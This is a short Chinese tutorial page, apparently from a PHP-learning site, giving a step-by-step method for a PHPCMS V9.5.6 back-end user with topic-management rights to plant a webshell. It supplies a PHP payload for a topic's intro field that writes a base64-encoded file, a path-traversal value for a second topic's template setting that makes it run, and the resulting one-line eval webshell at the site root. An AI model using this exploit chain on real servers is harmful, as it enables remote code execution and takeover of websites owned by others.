来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] PHPCMS后台低权限拿webSHELL前提是需要有管理专题的权限测试版本PHPCMS程序版本:Phpcms V9 5 6 Release 20140522过程1 添加专题专题名称:test专题横幅: 1 jpg专题缩略图: 1 jpg专题导读:?php fil...
|
前提是需要有管理专题的权限
测试版本 PHPCMS程序版本:Phpcms V9.5.6 Release 20140522 过程 1. 添加专题 专题名称:test 专题横幅:/1.jpg 专题缩略图:/1.jpg 专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?> 生成静态:是 专题生成目录:test000 专题子分类:test test 其他默认 -> 提交
2. 再次添加专题 专题名称:test1 专题横幅:/1.jpg 专题缩略图:/1.jpg 专题导读: 生成静态:是 专题生成目录:test111 专题子分类:test test 扩展设置 专题模板:value设置为 ../../../../html/special/test000/index 其他默认 -> 提交
会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
